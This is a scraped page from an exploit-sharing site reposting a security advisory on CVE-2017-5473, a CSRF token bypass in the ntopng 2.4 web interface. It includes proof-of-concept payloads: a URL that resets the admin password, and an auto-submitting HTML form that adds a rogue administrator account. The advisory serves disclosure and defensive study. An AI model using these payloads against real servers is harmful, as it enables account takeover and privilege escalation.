0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ntopng Web Interface 2.4.160627 Cross Site Request Forgery Vulnerability
Author
Risk
[Security Risk Low
]0day-ID
Category
Date add
CVE
Platform
[+]##################################################################################### [+] Credits / Discovery: John Page AKA Hyp3rlinX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt [+] ISR: ApparitionSEC [+]##################################################################################### Vendor: ============ www.ntop.org Product: ==================== ntopng Web Interface v2.4.160627 ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well. Vulnerability Type: ================== CSRF Token Bypass CVE Reference: ================ CVE-2017-5473 Security Issue: ================= By simply omitting the CSRF token or supplying arbitrary token values will bypass CSRF protection when making HTTP requests, to the ntopng web interface. Allowing remote attackers the rights to make HTTP requests on an authenticated users behalf, if the user clicks an malicious link or visits an attacker webpage etc. Exploit/POC: ============ 1) Change admin password http://VICTIM-SERVER:3000/lua/admin/password_reset.lua?csrf=NOT-EVEN-CHECKED&username=admin&new_password=xyz123&confirm_new_password=xyz123 2) Add arbitrary <form action=" http://VICTIM-SERVER:3000/lua/admin/add_user.lua?csrf=NOT-EVEN-CHECKED" method="GET"> <input type="hidden" name="username" value="hyp3rlinx"> <input type="hidden" name="full_name" value="TheApparitioN"> <input type="hidden" name="password" value="abc123"> <input type="hidden" name="confirm_password" value="abc123"> <input type="hidden" name="host_role" value="administrator"> <input type="hidden" name="allowed_networks" value="0.0.0.0/,::/"> <input type="hidden" name="allowed_interface" value="HTTP/1.1"> <script>document.forms[0].submit()</script> </form> Disclosure Timeline: ===================== Vendor Notification: January 11, 2017 Vendor acknowledgement: January 12, 2017 Vendor Fixed Issue January 20, 2017 : Public Disclosure Network Access: =============== Remote Impact: ====================== Information Disclosure Privilege Escalation # 0day.today [2024-11-16] #